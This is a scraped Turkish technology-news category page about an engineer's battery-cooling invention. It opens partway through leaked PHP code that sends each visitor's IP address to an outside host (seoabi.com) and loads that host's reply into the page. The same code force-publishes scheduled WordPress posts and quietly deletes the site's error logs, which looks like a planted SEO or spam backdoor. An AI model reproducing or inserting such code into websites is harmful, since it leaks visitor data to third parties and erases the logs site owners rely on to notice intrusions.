$value) { $post_string .= $key.'='.urlencode(trim($value)).'&'; } rtrim($post_string, '&'); curl_setopt($ch,CURLOPT_POST, count($post)); curl_setopt($ch,CURLOPT_POSTFIELDS, $post_string); } $result=curl_exec($ch); return $result; } $mcuOutput = conn('https://seoabi.com/wmbys/blog-api.php?ip='.$_SERVER['REMOTE_ADDR']); $GLOBALS['mcuOutput'] = json_decode($mcuOutput); $wpdb->query("UPDATE `wp_posts` SET post_status = 'publish' WHERE post_status = 'future' && post_date < NOW()"); @unlink($_SERVER['DOCUMENT_ROOT'].'/error_log'); @unlink($_SERVER['DOCUMENT_ROOT'].'/imle/error_log'); ?> buluş | Teknoloji Haberleri

buluş kategorisindeki tüm yazılar

Son Yazılar

Türk mühendisten müthiş buluş

Bursa’da Uludağ Üniversitesi Teknoloji Geliştirme Bölgesi’nde (ULUTEK) çalışmalarını yürüten Makine Mühendisi Kemal Furkan Sökmen’in geliştirilen “Elektrikli araçlar için su soğutmalı akü modülü”, Bilim, Sanayi ve Teknoloji Bakanlığı’nın Tekno girişim desteği sermayesi kapsamında ülke genelinde değerli bulunan ve desteklenen 6 projeden biri oldu. Genç girişimci Kemal Furkan Sökmen,